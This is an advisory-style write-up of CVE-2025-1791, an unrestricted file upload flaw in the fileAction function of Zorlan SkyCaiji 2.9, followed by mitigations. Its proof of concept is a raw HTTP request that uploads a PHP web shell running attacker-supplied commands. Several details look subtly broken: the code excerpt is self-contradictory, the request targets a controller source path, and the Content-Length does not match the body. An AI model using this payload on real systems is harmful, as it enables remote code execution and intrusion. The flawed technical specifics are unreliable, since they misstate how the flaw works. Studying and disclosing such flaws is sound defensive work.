CVE-2025-1791 - Critical Remote Unrestricted File Upload Vulnerability Discovered in Zorlan SkyCaiji 2.9

A critical vulnerability has been identified in Zorlan SkyCaiji 2.9, a popular web crawling and data extraction tool. The vulnerability, designated as CVE-2025-1791, affects the fileAction function of the vendor/skycaiji/app/admin/controller/Tool.php file. An attacker can exploit this vulnerability by manipulating the save_data argument, leading to unrestricted file uploads. As a result, this could allow the attacker to execute malicious code on the affected system or exfiltrate sensitive data. The attack can be launched remotely, and the exploit details have been released to the public, making the vulnerability even more dangerous and urgent to address.

Exploit Details

The vulnerability is present in the fileAction() function of the vendor/skycaiji/app/admin/controller/Tool.php file. Below is an excerpt of the vulnerable code snippet:

public function fileAction(){
  $op=input('op');
  $path=input('path','','\skycaiji\admin\model\CheckInput::escape_dir');
  $ext='';
  if(preg_match('/^[a-z]/i', $ext)){
      $ext='';
  }

  $saveData=input('save_data','');
  $fileName=input('name');
  $fileExt=input('ext');
  $fileContent=input('content');
...
}

An attacker can manipulate the save_data argument to upload a file with malicious content and execute it. Since there is no proper filtering mechanism for the content of the uploaded file, the attacker has full control over what code gets executed, making it a highly critical vulnerability.

The following is a PoC (Proof of Concept) for the exploit

POST /vendor/skycaiji/app/admin/controller/Tool.php HTTP/1.1
Host: TARGET-HOST
Content-Type: multipart/form-data;boundary=---------------------------140378292840
Content-Length: 118

-----------------------------140378292840
Content-Disposition: form-data; name="save_data"; filename="malicious_payload.php"
Content-Type: text/php

<?php system($_GET['cmd']); ?>
-----------------------------140378292840--

Using this PoC, an attacker can upload a file named "malicious_payload.php" containing PHP code to execute arbitrary commands on the affected system.

Original References

1. CVE-2025-1791 on the National Vulnerability Database
2. Zorlan SkyCaiji 2.9 source code

Mitigation

As of now, there hasn't been an official patch released for this vulnerability, but there are some temporary mitigations that can be implemented:

Disable the web application's file upload functionality, if not required.

2. Implement strict access controls to restrict access to the affected vendor/skycaiji/app/admin/controller/Tool.php file.
3. Deploy a Web Application Firewall (WAF) with rules to detect and block attempts to exploit this vulnerability.

Conclusion

The critical unrestricted file upload vulnerability in Zorlan SkyCaiji 2.9, identified as CVE-2025-1791, allows remote attackers to execute malicious code on the affected system. With details of the vulnerability already disclosed to the public, it becomes imperative for users and administrators of this web application to apply the recommended mitigation measures as soon as possible, and watch out for an official patch release from the developers of Zorlan SkyCaiji.

Timeline

Published on: 03/01/2025 14:15:34 UTC
Last modified on: 03/03/2025 21:15:16 UTC